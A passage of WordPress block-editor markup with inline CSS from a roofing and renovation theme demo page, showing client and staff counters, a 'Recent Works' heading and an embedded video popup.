2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6aed668a-fb10-4525-96ac-4bc41b761fd7\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\"} -->\n<style type=\"text/css\"> .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"42aff9bf-25ea-43ea-b807-8a8c00c85148\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-42aff9bf-25ea-43ea-b807-8a8c00c85148 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"67a82438-88af-4556-ac9e-4c3da247e0cf\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-67a82438-88af-4556-ac9e-4c3da247e0cf\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"72cbdd00-2b42-4deb-a7fd-0c19210e65bf\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ce6cb053-1ec8-4c04-85db-13a427505324\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-ce6cb053-1ec8-4c04-85db-13a427505324 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9f4663ea-a5db-40fc-b1cc-f21b84eb8759\"} -->\n<style type=\"text/css\"> .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 